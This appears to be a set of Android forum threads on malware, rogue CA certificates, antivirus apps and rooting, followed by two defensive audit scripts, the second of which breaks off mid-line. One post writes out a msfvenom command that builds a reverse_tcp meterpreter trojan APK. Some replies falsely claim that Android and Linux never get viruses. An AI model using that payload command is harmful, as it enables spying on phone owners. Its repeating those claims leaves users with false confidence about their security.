[Q] Virus and Rootkits in Android - General Questions and Answers

Hi
I have a rooted AGM Rock V5; I rooted it with a root zip provided on this site, and as third-party applications I installed dSploit, Anti from Zimperium, and DroidSheep.
Yesterday someone tried to log into my Facebook account, which I have synced on my smartphone, and I immediately changed my password.
Just for the sake of completeness, I have installed an anti-virus on my smartphone, Avast Mobile Security, and it detected 6 problems, all relating to dSploit, DroidSheep, and Anti: android Dploit A, android anti-c, android hackTool D, and several others, all related to these three packages: Anti, from Zimperium, which is a pen-testing application, DroidSheep, and dSploit.
I ask now: are these warnings normal? Has my smartphone been compromised? I have also run the Carrier IQ detection tool, and no rootkit has been detected...
What should I do?
BR
Alex

Uninstall all and don't always think of being the man in the middle...

Lim Wee Huat said:
Uninstall all and don't always think of being the man in the middle...
Thanks for your reply.
I just run them for fun, to see whether my own laptop is secure; I am using Ubuntu Linux 12.04 on my laptop...
But I mean, aren't these applications supposed to be secure? I am not talking about Anti, from Zimperium, deemed a "pen-tester" toolkit, closed source, but are things such as dSploit and DroidSheep compromised?? I thought they were open source, and as such highly unlikely to hide a rootkit or a virus..
BR
Alex

I think you should go through the following link
https://forum.avast.com/index.php?topic=123133.0
I searched for the dSploit error and I feel that those apps need some more scrutiny.


Prevent Google from Deleting / Installing Programs

Hi,
I don't have an Android phone yet. But I'm still a little bit frightened about data security there.
I read this article:
hxxp://w ww.theregister.co.uk/2010/06/28/google_remote_android_application_install/
I think normally you should decide yourself what to uninstall and what not.
So my question is: would it be possible to prevent Google from accessing your phone, meaning prevent them from installing/uninstalling applications?
Because I hate this. My phone is my phone and they aren't allowed to play the "admin".
Regards
eagle
fear not
If you read further into this, they are talking about malicious apps, and it is done for the malicious app or apps only; they are actually protecting your phone from being crippled, and it is done system-wide for those that use the Market.
APKs installed from SD can't be touched by Google. Only ones installed from the Market can be removed. AFAIK so far they have only removed malicious apps (so far), but Google's definition of malicious is different from mine.
Hi,
thank you for your answers! I know that they removed only a malicious app... but like mercianary already said: this time they only removed a malicious app...
They could instead (of remote uninstall) just release a "fix" that you can download over the Android Market, and this fix then cleans your mobile phone...
At least they can't remove stuff that you installed from SD... this is good...
But is there a way to modify the ROM so they won't have any access any more?
Or can you disable this if you have root rights?
Regards
eagle
P.S.
What else can Google do with your phone? What do they log?
They take your soul. Piece by piece. Slowly over the years. Just like they do with every other product they give you for "free"
But that's another thread...
Sounds like humor but it's probably right :-/
The fact is:
I waited all this time for Windows Phone 7. I thought that they would make it a good OS... but now... no multitasking, ugly menu... it seems to me worse than iOS (subjective opinion =) ).
You don't have enough options/settings and so on. It looks to me like they try to copy Apple now, and they don't try to make it better =(
And now Android comes with tethering, hotspot ability, a nice menu... a "free" market, and so on.
If I weren't afraid of Google I would choose it without hesitation.
You got any pro points for Win7 Phone?
----
Don't get me started on Microsoft...
It's certainly possible to mod Market to disable this feature. Of course you would need root to do this.
Well, with custom ROMs and ROM-specific apps you shouldn't have to worry, because essentially you are loading an update zip, so I think you'll be OK there, and they would be morons to start randomly messing with people's phones.
Hi,
Nice answers =) I like you, I already got some.
New questions:
- Are there already such modified ROMs?
- If not, will there be some?
- @mercianary, why shouldn't I get you started on Microsoft? Start please
What is your fav OS? Are you scared of Google, too?

[Q] With new Android 4.3 Security features, is an av still needed?

On the Android site, they said that 4.3 checks every app you install against a blacklist maintained by Google and that each app is sandboxed. Do you guys think an AV is still necessary?
bump
http://forum.xda-developers.com/showthread.php?t=2226733
http://forum.xda-developers.com/showthread.php?t=2186782
http://forum.xda-developers.com/showthread.php?t=2041991
http://forum.xda-developers.com/showthread.php?t=1624199
http://forum.xda-developers.com/showthread.php?t=1917990
http://forum.xda-developers.com/showthread.php?t=2254029
and so on...:good:
Bump
TimeAndroid said:
On the Android site, they said that 4.3 checks every app you install by a blacklist maintained by Google and that each app is sandboxed. Do you guys think an AV is still necessary?
Click to expand...
Click to collapse
It really depends on how much you care about security. There have been several viruses on Android, but most of it comes from Android applications. A virus can come from an image, email attachment or anything else shared. But the question would more be: who uses Android for its security? There are much better operating systems for security maniacs.
I suppose that you mean AV as in anti-virus. Some apps claim to be anti-virus, but they are not at all. It's more about analyzing app behavior and permissions than virus registries.
I personally do not use anti-virus because I do nothing really sensitive. I don't even care if my Android device is turned into a zombie bitcoin machine for others.
etiennep said:
It really depends on how much you care about security. There have been several viruses on Android, but most of it comes from Android applications. A virus can come from an image, email attachment or anything else shared. But the question would more be: who uses Android for its security? There are much better operating systems for security maniacs.
I suppose that you mean AV as in anti-virus. Some apps claim to be anti-virus, but they are not at all. It's more about analyzing app behavior and permissions than virus registries.
I personally do not use anti-virus because I do nothing really sensitive. I don't even care if my Android device is turned into a zombie bitcoin machine for others.
I do not have anything sensitive
I do not open emails on my phone
I do not download apps 3 stars and below
Am I safe? :fingers-crossed:
I think you still need a good antivirus
Security is weak in Android but it can be achieved
If you don't sideload apps
Don't root your phone
Use an AV
If you do
Then after rooting
it is always insecure
Thank you for helping me

VULNERABILITY IN ALL Android Devices

Code:
This is just for educational purposes, nothing else.......
So while I was learning about Linux, I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ hacking tools and has the
Metasploit framework in it. Basically it will either create a Windows trojan or an Android trojan. I researched it a bit and came to know that when you basically type the following in the terminal:
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command makes it compile an .apk with the payload and creates it.
When installed on an Android device it is installed as MainActivity.apk
It can access a phone's contacts, SMS logs, call logs, MICROPHONE, CAMERA!!!, device tree, contents of the device, keylogs etc...
It is a light trojan (not more than 0.3 MB) and can run in the background unnoticed. This information from your device is streamed to the hacker and compromises your security. So never download unknown APKs from the web.
In /system/app, by default, there is a stock app called DefaultContainer.apk (fixed)
All Android devices have a DRM server and DefaultContainer.apk
Someday I thought: "what if I disable this app?"
Well, good question:
Answer is (when trying to install by brute force or PackageInstaller with DefaultContainer.apk disabled)
Result:
Unable to install package...
No exploits like this will be done any time soon.
Sent from SomeFon
Either Google Inc. or AOSP must ensure that an exploit of this nature mustn't happen in the future...
Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.
yawn... you might as well have titled this "Water found in ocean"
For starters, Android is awesome and very, very flawed (like most 10/10 chicks you will ever meet). This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that Android isn't secure enough to order pizza online (seriously). Every few months there's a headline "huge vulnerability detected in Android, patch unavailable but uhhh coming soon" (5 yrs later)
As for Kali, it's the successor or second edition to BackTrack Linux. These are distros specifically made for penetration testing. Basically it's another tool for network security experts to assess the condition of a network's known vulnerabilities that haven't been patched yet. Using Metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated than typing one command into a box.... one day lol. Ohhh and those pentesting distros (BackTrack is now retired) are nothing special... it is just a basic version of Linux that comes preinstalled with a TON of basically every security app you would ever want. It is generally not recommended to run Kali as your personal OS, especially if you are teh noobcakes..
Don't use the Blackmart app.
This is a dangerous malware masked as
a parallel market
DON'T use ANY MARKET APP
TRY to cut by BRUTE FORCE YOUR DEVICE and urgently delete all that are Google's apps!!
These apps are sending random authentic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
Jar files, and dex files, ACCORDING TO THE ANDROID MASTER KEY,
May gain root, may destroy your GPU or simply your device does not boot anymore.
I tried to continue to use the Blackmart app with a locked cache folder.
The app refuses to start
The app NEEDS THE CACHE FOLDER FREE
For starting their CHEATS.
AN APP THAT REFUSES TO START WHEN THE CACHE FOLDER IS LOCKED IS MALWARE!
The app curiously worked with a locked cache after a few days, but now it is refusing.
BE AWARE OF ALL THE CHIT THAT GOOGLE'S SICK AND THEIR PEST SLAVES ARE DOING WITH YOU
Sent from Somefon
epic wow.... like just woah
I tried to continue to use the Blackmart app with a locked cache folder.
The app refuses to start
This, my friend, was not an educated decision whatsoever... "Google's got the freakin' kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google, "which is government owned and operated now for some time... along with their butt buddies Facebook". My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom ROM like CyanogenMod on your cellphone. And yeah, I would never ever recommend pirating Google Play... just... no!
But really it doesn't matter in the end... Android is sooooooo filled with critical exploits... I wouldn't lose any sleep over it... and don't worry, all the same it will only get worse over time with Google and the bully things that bullies do.
The exploits are born on a critical OS, which began in a DAMN INC. NAMED GOOGLE, that DOES NOT RECOMMEND ROOT, BECAUSE THEY ARE ROOT.
I have never seen a Windows or Unix-like OS without root
Did you ever see any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick to hack the entire Facebook and Opera servers!
Sent from Somefon

False positive virus detection

Yesterday, after updating The Guardian (beta) app, I got a message that the app contains a virus and should be removed immediately, so I did.
Today I tried to figure out why, as I don't install anything outside the Play Store; what I found out was that, despite thinking that I had disabled it, Avast (which lives somewhere inside Phone Manager) checks every app upon installation. Running a scan showed, to my surprise, that I have another 4 apps with different viruses!
Long story short, by updating the virus definitions from about one month ago to the most recent version, it doesn't detect any virus anymore.
Having said that, how can I permanently disable it? It is ridiculous and probably a security fail that a system app that is not controlled by Huawei or Google can download and run code on the phone.
Anyone else experienced the same?
supersakis said:
Yesterday, after updating The Guardian (beta) app, I got a message that the app contains a virus and should be removed immediately, so I did.
Today I tried to figure out why, as I don't install anything outside the Play Store; what I found out was that, despite thinking that I had disabled it, Avast (which lives somewhere inside Phone Manager) checks every app upon installation. Running a scan showed, to my surprise, that I have another 4 apps with different viruses!
Long story short, by updating the virus definitions from about one month ago to the most recent version, it doesn't detect any virus anymore.
Having said that, how can I permanently disable it? It is ridiculous and probably a security fail that a system app that is not controlled by Huawei or Google can download and run code on the phone.
Anyone else experienced the same?
As far as I know, Android phones won't get affected by any kind of viruses, bro
Rommco05 said:
I'm not sure about that. For example malware, and you still send emails, files... so you can send anything with these files (ransomware, malware...), maybe I'm wrong...
Any kind of virus, even ransomware, won't affect Android smartphones!
Always remember, Linux machines and Android machines never get any virus..
So, I recommend not to use any antivirus and bull**** apps which claim to free up RAM for you!
I never used any antivirus apps from my first phone till now, and I'm now using my 11th phone
Rommco05 said:
Ok, so you received some infected file; in Android it can do nothing, but you can resend it to some PC, no?
That might cause a problem for the PC you are sending the infected file to!
Rommco05 said:
...and if you have antivirus in your phone, you know about that and can do something...
And antivirus apps on Android are not very effective scanners when compared to internet antivirus PC software, so you will have a very low chance of knowing about the presence of a serious virus like ransomware
And if you could find out that the file is infectious, of course, you can delete the file or do something about it so that it won't affect any PC if you accidentally forward it to someone
Well, you will also see poor results if the last antivirus definitions updated are too old.
Hello,
Did anyone read the post? I am talking about the embedded antivirus that exists in this particular phone's firmware, which is powered by Avast. I didn't install it myself.
As for viruses: a lot of inaccuracies in the posts as well. Linux can get "viruses"; a better term would be malware. Android, especially rooted devices, can also get malware that persists across reboots and in some cases even flashes. However, the kind of malware this particular antivirus catches is mostly spyware: the use of a toolkit that might try to steal sensitive data from your phone.
In any case, I was talking about a malfunction of this antivirus, which I cannot remove or disable, and I was wondering if anyone else witnessed anything similar. Now, if you don't even know that you have a version of Avast on your phone... well... that's a different story.

Trojan infected recovery phone partition

Hi,
I'm new to XDA. I think I'm in the right forum for my issue. My phone was infected with what I think is a type of auto-rooting trojan. I was looking for info on an app I'm using called Duraspeed. I came across this website that started throwing popups at me saying my phone had tons of viruses, which was a lie. By the time I could break free from the drive-by attacks, it was too late. I started getting sluggish performance on my phone and popup ads randomly. Even though it somehow gained root access, my phone is not rooted. Never was. It's still not! Because I checked with several apps from the Play Store to confirm this. Long story short:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
The file running on the phone as a system app is called "ad_surface"
I can only force stop and disable ad_surface, without the ability to uninstall. I have to repeat this process every time I reboot. This stops the ads from popping up. Funny thing is, even though the force stop button in app settings is greyed out, meaning it was stopped and disabled, my OS Monitor app that shows running processes shows ad_surface is still running. Yet it does stop the random popup ads by doing it this way. I've tried 360 AV, Avast, AVG, Malwarebytes, Kaspersky, stubborn rootkit remover, a lot of antivirus programs, but nothing detects it. I'm using Total Commander File Manager to view the device system partitions. I even copied the two trojan files to a folder on the user partition to see if any of the antivirus programs could check them there, away from the root areas. But nothing. My guess is that I need to root my phone so I can gain access to the apk file and delete it. I haven't done a factory reset because I realize that apk file is in the recovery partition in order to reinstall itself. I've never rooted a phone before, but I have Kingroot installed. I downloaded it from XDA. I just don't have the guts to use it for fear of bricking. Do you think it would work with my phone? Does it abort the root procedure if it can't do it? Here are my phone specs:
Vortex Beat 8
Software build: 8_V1.5_20171011
Chipset: MT6580M Cortex-A7
CPU Architecture: ARMv7 Processor Rev 3(V71)
Cores: 4 1300MHz
Kernel Version: 3.18.19
Total Ram: 459MB
Internal ROM: 8GB (4GB for user)
That's about it. If there's anything anybody could recommend on how to go about this, I would greatly appreciate the help. Thank you...
Go try factory resetting it; it doesn't hurt to try.
If the "virus" is still there you can always re-flash the phone's OS. Here is the link to the stock ROM ---> http://www.needrom.com/wp-content/uploads/2017/04/BEAT-8_V1.06_20170413.rar
The link below is a tutorial on how to flash the phone's ROM.
https://www.getdroidtips.com/stock-rom-vortex-beat-8/#How_to_Download_Stock_ROM_on_VORTEX_Beat_8
In MTK Droid Tools, have all the boxes unchecked, and make sure you only have "ANDROID" and "RECOVERY" check-marked. The other boxes are just about the phone's information and properties. These shouldn't be checked because it might erase your IMEI/drivers or other stuff. After flashing the ROM make sure you do a complete factory reset + cache wipe. Erase whatever you have on your SD cards or micro SD cards.
Just do this and call it a day
Good luck
Cool
Hi, thank you! I will try this. I will have to borrow someone's computer, like my nephew's. I did try Kingroot and OneClickRoot but they both failed. Perhaps due to a locked bootloader. Or the evil trojan that made itself super user, blocking them. I did do a factory reset, but the trojan persists. My mistake was forgetting to turn off unknown sources in security settings. I think that's how it got in... I'll keep checking back on this thread in the meantime to see if someone knows a tool that can kill the trojan, but I doubt it. Cheers!
SecretSociety68 said:
Hi, thank you! I will try this. I will have to borrow someone's computer, like my nephew's. I did try Kingroot and OneClickRoot but they both failed. Perhaps due to a locked bootloader. Or the evil trojan that made itself super user, blocking them. I did do a factory reset, but the trojan persists. My mistake was forgetting to turn off unknown sources in security settings. I think that's how it got in... I'll keep checking back on this thread in the meantime to see if someone knows a tool that can kill the trojan, but I doubt it. Cheers!
I'm having similar troubles. I somehow believe I have an entire infected network, from Windows 10 to iOS and all the cell phones, even two 3G flip phones; even the smart car has been recognized. I communicated with the virus/hacker network. I have no idea how to get rid of it. It gives itself super user privileges without quite rooting the phone and hides itself in system apps, so it's virtually impossible to get rid of, at least for me it is. I have a post here called "wading deep Waters", please do check it out
sassyfrassy said:
I'm having similar troubles. I somehow believe I have an entire infected network, from Windows 10 to iOS and all the cell phones, even two 3G flip phones; even the smart car has been recognized. I communicated with the virus/hacker network. I have no idea how to get rid of it. It gives itself super user privileges without quite rooting the phone and hides itself in system apps, so it's virtually impossible to get rid of, at least for me it is. I have a post here called "wading deep Waters", please do check it out
It isn't unheard of for a router to get infected with a virus/malware; rare, but not exactly impossible. I've run across others here over the years that have discussed this issue. I don't remember any specifics, tools or methods to fix the issue though, but you can probably find info on removing malware from a router.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It isn't unheard of for a router to get infected with a virus/malware; rare, but not exactly impossible. I've run across others here over the years that have discussed this issue. I don't remember any specifics, tools or methods to fix the issue though, but you can probably find info on removing malware from a router.
Thank you for your prompt response. I'm not positive that the router and modem are infected; more or less they are overloaded from the amount of leeches and hitchhikers I have from this awful network of hackers and code running through my TVs, my cars, for god's sake. I read one of their lauder's I got in somehow, and I could see that they were logging how many seconds it took me from getting out of the car to getting into my home; that was just one scary example. They could tell when my phone was in my pocket and if I was walking and how many people were with me. This is just my cell phone, not to mention my TVs, the laptops. I have no idea what to do
sassyfrassy said:
Thank you for your prompt response. I'm not positive that the router and modem are infected; more or less they are overloaded from the amount of leeches and hitchhikers I have from this awful network of hackers and code running through my TVs, my cars, for god's sake. I read one of their lauder's I got in somehow, and I could see that they were logging how many seconds it took me from getting out of the car to getting into my home; that was just one scary example. They could tell when my phone was in my pocket and if I was walking and how many people were with me. This is just my cell phone, not to mention my TVs, the laptops. I have no idea what to do
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
Thank you, I really appreciate you taking the time to think about my situation. I have had no one to talk to about this for 2 months.
sassyfrassy said:
Thank you, I really appreciate you taking the time to think about my situation. I have had no one to talk to about this for 2 months.
Not sure how much help I'll be to you. I'm no expert in what you're dealing with. I'm just telling you some possibilities that I've seen others dealing with over the years.
Sent from my LGL84VL using Tapatalk
Droidriven said:
It sounds to me like their hold over you has more to do with your personal information than with your devices. With certain pieces of your info, they can gain access to any device that you sign into, login to or even just enter information in while using, even if it isn't yours.
If your network provider randomly cycles IP addresses among its users, it could be that the hacker has previously hijacked that IP address while another user was using it and his access carried over to you when the IP was assigned to you. If this is so, a new IP and changing all of your account info among all of the various accounts you have would cut him off, maybe?
I'm not the best at network security issues that go that deep. My network management/LAN Admin days were a very long time ago, too many things have changed.
You hit the nail on the head! Told me "unfortunately we have met"
Sent from my LGE LGL158VL using XDA Labs
SecretSociety68 said:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
Translation: it installed itself to the privileged app section on your phone, which does not get deleted with a reset (a new ROM does); this also gives the app more power.
It can only be done with root, so the app rooted your phone (at least temporarily). Here is an app that removes it, but it needs root:
https://f-droid.org/en/packages/de.j4velin.systemappmover/
And a system priv-app has AFAIK full power; however, as of Oreo there is another file to give it permissions, so says Google: https://source.android.com/devices/tech/config/perms-whitelist namely
/etc/permissions/privapp-permissions-OEM_NAME.xml
/etc/permissions/privapp-permissions-DEVICE_NAME.xml
Check these files and see what you find.
SecretSociety68 said:
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
Translation: it installed a CA certificate that enables them to have an SSL connection, or with this certificate they can spoof websites.
Of course this should be deleted, but again you will need root (or a new ROM).
SecretSociety68 said:
The file running on the phone as a system app is called "ad_surface"
The app has to be running with a Linux GUID, so you can check with that.
The apps cannot find root; this can be because the program used root once to get elevated status (temporary root) and then does not need it anymore,
so you cannot find it. The question still remains how they did that, but right now you need to get out.
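A defender-side check for the places this reply points at: the contents of /system/priv-app, the Oreo privapp-permissions whitelist, and the cacerts directory from the earlier quote. This is an added example, not code from the thread or from AOSP; the APK paths, package names, hash values and the OEM XML are constructed samples, and on a real device the listings would come from a clean stock image and from the phone (for instance over adb) before being fed in.

```python
"""Audit a device's /system/priv-app, /system/etc/security/cacerts and
privapp-permissions whitelist against a clean-firmware baseline.
Added example; all inputs below are constructed samples."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed: APK paths as a recursive listing of /system/priv-app would
# show them on the clean stock image (baseline) and on the device (current).
BASELINE_PRIV_APPS = {
    "/system/priv-app/Settings/Settings.apk",
    "/system/priv-app/Launcher3/Launcher3.apk",
    "/system/priv-app/Dialer/Dialer.apk",
}
CURRENT_PRIV_APPS = BASELINE_PRIV_APPS | {
    "/system/priv-app/ads_popup-release.apk",  # the file named in the thread
}

# Constructed: cert file name -> SHA-256 of the file contents.  The hash
# strings are placeholders; the second entry is the file the thread says
# was modified, so its hash differs from the baseline.
BASELINE_CACERTS = {"3513523f.0": "sha256-placeholder-A",
                    "8e710bb7.0": "sha256-placeholder-B"}
CURRENT_CACERTS = {"3513523f.0": "sha256-placeholder-A",
                   "8e710bb7.0": "sha256-placeholder-CHANGED"}

# Constructed privapp-permissions XML in the AOSP whitelist format
# (hypothetical OEM file).  The second entry is what a dropper would have
# to add so its priv-app keeps privileged permissions on Oreo and later.
PRIVAPP_XML = """<?xml version="1.0" encoding="utf-8"?>
<permissions>
  <privapp-permissions package="com.android.settings">
    <permission name="android.permission.WRITE_SECURE_SETTINGS"/>
  </privapp-permissions>
  <privapp-permissions package="com.example.ads_popup">
    <permission name="android.permission.INSTALL_PACKAGES"/>
    <permission name="android.permission.READ_LOGS"/>
  </privapp-permissions>
</permissions>"""
# Packages the clean firmware's whitelist is known to cover (constructed).
BASELINE_WHITELISTED = {"com.android.settings"}


@dataclass
class Findings:
    new_priv_apps: set = field(default_factory=set)
    new_cacerts: set = field(default_factory=set)
    changed_cacerts: set = field(default_factory=set)
    unexpected_grants: dict = field(default_factory=dict)

    def is_clean(self) -> bool:
        return not (self.new_priv_apps or self.new_cacerts
                    or self.changed_cacerts or self.unexpected_grants)


def new_entries(baseline, current):
    """Paths present on the device but absent from the clean image."""
    return set(current) - set(baseline)


def diff_cacerts(baseline, current):
    """Split the device's cert store into added and modified files."""
    added = {name for name in current if name not in baseline}
    modified = {name for name in current
                if name in baseline and current[name] != baseline[name]}
    return added, modified


def parse_privapp_permissions(xml_text):
    """Map each whitelisted package to the permissions it is granted
    (<deny-permission> entries are ignored here)."""
    root = ET.fromstring(xml_text)
    grants = {}
    for entry in root.iter("privapp-permissions"):
        perms = [p.get("name") for p in entry.findall("permission")]
        grants[entry.get("package")] = sorted(perms)
    return grants


def audit(baseline_apps, current_apps, baseline_certs, current_certs,
          xml_text, known_packages):
    """Run all three comparisons and return a Findings record."""
    f = Findings()
    f.new_priv_apps = new_entries(baseline_apps, current_apps)
    f.new_cacerts, f.changed_cacerts = diff_cacerts(baseline_certs, current_certs)
    grants = parse_privapp_permissions(xml_text)
    f.unexpected_grants = {pkg: perms for pkg, perms in grants.items()
                           if pkg not in known_packages}
    return f


def audit_sample():
    """Convenience wrapper over the constructed samples above."""
    return audit(BASELINE_PRIV_APPS, CURRENT_PRIV_APPS, BASELINE_CACERTS,
                 CURRENT_CACERTS, PRIVAPP_XML, BASELINE_WHITELISTED)


if __name__ == "__main__":
    r = audit_sample()
    print("clean" if r.is_clean() else
          {"new_priv_apps": sorted(r.new_priv_apps),
           "cacerts_added_or_modified": sorted(r.new_cacerts | r.changed_cacerts),
           "unexpected_grants": r.unexpected_grants})
```

Against the constructed inputs the audit flags the stray APK, the modified 8e710bb7.0 file and the whitelist entry for the unknown package; a real run also needs a baseline from the exact same firmware build, since OEM updates legitimately change all three locations.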
Waiting for other response. Hehe.
I had this take control of multiple devices and 2 computers: 3 Android phones, an Apple iPhone and 2 Windows computers. I spent countless hours going through logs and data. On my Android devices it even made a cloned version of TWRP so it would reinstall itself through recovery. I spent hours on the phone with Samsung and Apple senior advisors. I viewed the analytic data on the Apple device over and over. Extremely weird things were running. Constantly writing system writes on a stock Apple phone. It was able to transfer from device to device over wifi hotspot. It went on for over two months. I had a Roku TV also become monitored. It was the craziest **** I've ever had happen to me. It literally almost drove me insane and I thought I was going crazy. I've never seen anything like it. Even Google results were completely false and fake sites. I didn't know this happened to anyone else. I've got countless logs and screenshots saved in case I ever needed to share the info. It even remotely sipped my desktop hard drives and had me connecting to a remote server on boot.
---------- Post added at 07:48 PM ---------- Previous post was at 07:37 PM ----------
I could make a phone call and hear breathing in the background. I'd make a call and touch tone sounds would go off after the first ring. I was getting constant interference through my phone. It connected all my devices to a home group I never created. I literally had to destroy the devices
---------- Post added at 08:15 PM ---------- Previous post was at 07:48 PM ----------
Applied protocol - makes sense man, I'm just glad I got it off my back. On the iPhone, when you would install a new app from the "app store" it would run a wake-up over 4000 times a second to wake up an unknown app in system files. I'm assuming this was to clone the app or change some code in it when it was installed. The app name was ??? in the analytic logs and it was an "event write system". This was some dirty stuff man. Is this something that is common right now? This exploit across so many devices? I'd love to share some of these logs and screenshots if anyone is interested.
SecretSociety68 said:
Hi,
I'm new to XDA. I think I'm in the right forum for my issue. My phone was infected with what I think is a type of auto rooting trojan. I was looking for info on an app I'm using called Duraspeed. I came across this website that started throwing popups at me saying my phone had tons of viruses, which was a lie. By the time I could break free from the drive by attacks, it was too late. I started getting sluggish performance on my phone and popup ads randomly. Even though it somehow gained root access, my phone is not rooted. Never was. Its still not! Because I checked with several apps off the playstore to confirm this. Long story short:
It put a file called "ads_popup-release.apk"
in my root folder /system/priv-app/
And modified a file called "8e710bb7.0"
in root folder /system/etc/security/cacerts/
or put (installed) the file there I'm not sure.
The file running on the phone as a system app is called "ad_surface"
I can only force stop and disable ad_surface without the ability to uninstall. I have to repeat this process every time I reboot. This stops the ads from popping up. Funny thing is, even though the force stop button in app settings is greyed, meaning it was stopped and disabled, my OS Monitor app that shows running processes shows ad_surface is still running. Yet it does stop the random popup ads by doing it this way. I've tried 360 AV, Avast, AVG, Malwarebytes, Kaspersky, Stubborn Rootkit Remover, a lot of antivirus programs, but nothing detects it. I'm using Total Commander File Manager to view the device system partitions. I even copied the two trojan files to a folder on the user partition to see if any of the antivirus programs could check them there, away from the root areas. But nothing. My guess is that I need to root my phone so I can gain access to the apk file and delete it. I haven't done a factory reset because I realize that apk file is in the recovery partition in order to reinstall itself. I've never rooted a phone before, but I have Kingroot installed. I downloaded it from XDA. I just don't have the guts to use it in fear of bricking. Do you think it would work with my phone? Does it abort the root procedure if it can't do it? Here are my phone specs:
Vortex Beat 8
Software build: 8_V1.5_20171011
Chipset: MT6580M Cortex-A7
CPU Architecture: ARMv7 Processor Rev 3(V71)
Cores: 4 1300MHz
Kernel Version: 3.18.19
Total Ram: 459MB
Internal ROM: 8GB (4GB for user)
That's about it. If there's anything anybody who could recommend how to go about this I would greatly appreciate the help. Thank you...
Definitely malware! Mine was called "Ad-Time", like a kid's show or something, but either way, very persistent and pervasive! I have 2 ROMs (v1.5 & v1.6) in img format, easy fastboot flash. Look at this phone wrong and it's rooted. Anybody interested, hit me up; I even got the couple-line script to install SuperSU to /system (Beat 8 doesn't like Magisk). A simple su.d script to enable permissive SELinux, build.prop changes, and you have a $30 Nexus via MTK. I also ported TWRP 3.2.1 (no bugs) & Philz, but TWRP is my comfort zone.
Sent from my ZTE Sapphire 3G using XDA Labs
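The post quoted above mentions a modified file under /system/etc/security/cacerts/, which is where Android keeps its system root certificates, one PEM file per CA named by the OpenSSL subject hash (e.g. 8e710bb7.0). A CA planted there lets whoever controls it intercept TLS traffic without any browser warning, so it is worth checking independently of whatever the ad apk does. The script below is an added example, not code from the original posts: it audits a copy of that directory (pulled with `adb pull /system/etc/security/cacerts ./cacerts`) against a baseline of fingerprints taken from a stock ROM, flagging certificates whose fingerprint is unknown and files whose name does not match the certificate's subject hash. It assumes only POSIX sh and the openssl CLI; the subject names, directory names and the whole demo scenario are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): audit a pulled copy of
# Android's /system/etc/security/cacerts against a known-good baseline.
# Assumes only POSIX sh and the openssl CLI; names below are illustrative.
set -eu

# SHA-256 fingerprint of a PEM certificate as bare hex, e.g. 3a9f...
cert_fp() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 | sed 's/.*=//; s/://g'
}

# Print "<fingerprint> <file>" for every file in DIR. Run this against the
# cacerts directory of the stock ROM (or a clean device of the same model)
# to build the BASELINE file used by audit_cacerts.
list_cacerts() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        printf '%s %s\n' "$(cert_fp "$f")" "$(basename "$f")"
    done
}

# audit_cacerts DIR BASELINE
# One line per certificate in DIR:
#   MISMATCH <file> expected-name <hash>.N  file name is not the cert's subject
#                                          hash; Android keys the store by that
#                                          hash, so the file was hand-placed or
#                                          damaged
#   UNKNOWN  <file> <subject>               fingerprint not in BASELINE
#                                          (candidate injected CA)
#   OK       <file> <subject>
# Returns 1 if anything was flagged, 0 otherwise.
audit_cacerts() {
    dir=$1; baseline=$2; bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        fp=$(cert_fp "$f")
        subj=$(openssl x509 -in "$f" -noout -subject | sed 's/^subject= *//')
        hash=$(openssl x509 -in "$f" -noout -subject_hash)
        if [ "${name%.*}" != "$hash" ]; then
            printf 'MISMATCH %s expected-name %s.N\n' "$name" "$hash"; bad=1
        fi
        if grep -q "^$fp " "$baseline"; then
            printf 'OK       %s %s\n' "$name" "$subj"
        else
            printf 'UNKNOWN  %s %s\n' "$name" "$subj"; bad=1
        fi
    done
    return $bad
}

# Constructed scenario (not real device data): one stock CA that is in the
# baseline, one injected CA stored under its correct subject-hash name the way
# a careful implant would do it, and a copy of the injected CA under a name
# that does not match its hash. Prints the audit report.
demo_audit() {
    tmp=$(mktemp -d)
    mk() { openssl req -x509 -newkey rsa:2048 -nodes -days 30 -subj "$1" \
               -keyout "$tmp/k.pem" -out "$2" 2>/dev/null; }
    mkdir "$tmp/stock" "$tmp/device"
    mk "/CN=Stock Root CA/O=Vendor" "$tmp/stock/stock.pem"
    mk "/CN=Injected Root CA/O=Example" "$tmp/inj.pem"
    cp "$tmp/stock/stock.pem" \
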